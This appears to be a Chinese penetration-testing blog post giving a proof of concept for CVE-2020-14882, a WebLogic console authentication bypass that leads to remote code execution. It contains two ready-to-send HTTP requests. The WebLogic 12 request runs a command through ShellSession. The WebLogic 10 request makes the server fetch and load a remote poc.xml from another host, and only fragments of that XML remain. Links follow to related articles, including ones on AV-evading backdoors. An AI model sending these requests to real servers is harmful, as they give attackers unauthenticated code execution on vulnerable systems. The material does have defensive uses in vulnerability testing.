cve-2020-14882 weblogic 越权绕过登录POC

weblogic 12

GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22); HTTP/1.1
Host: 192.168.3.189:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ADM
Upgrade-Insecure-Requests: 1

weblogic 10

GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.8.142/poc.xml); HTTP/1.1
Host: 192.168.3.189:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ADM
Upgrade-Insecure-Requests: 1

poc.xml文件内容

<?xml version="1.0" encoding="UTF-8" ?>
    
        
            
            
                sh
                -c

参考:宽字节安全

渗透测试

cve-2020-14882 weblogic 越权绕过登录POC

weblogic 12

weblogic 10

相关

渗透测试(一)-Msf生成免杀后门(内网篇)

渗透测试(二)-Metasploit生成免杀后门(外网篇)

渗透测试之billu b0x2

IPv6渗透测试工具

渗透测试之劫持国外某云BucketName

easy file sharing server渗透测试

渗透测试实验二

一次内网渗透测试实验过程

10 渗透测试穷举 02

螣龙安科：内网渗透测试的重要性

C/S架构的渗透测试-请求加解密及测试

渗透测试之本地文件包含（LFI）

标签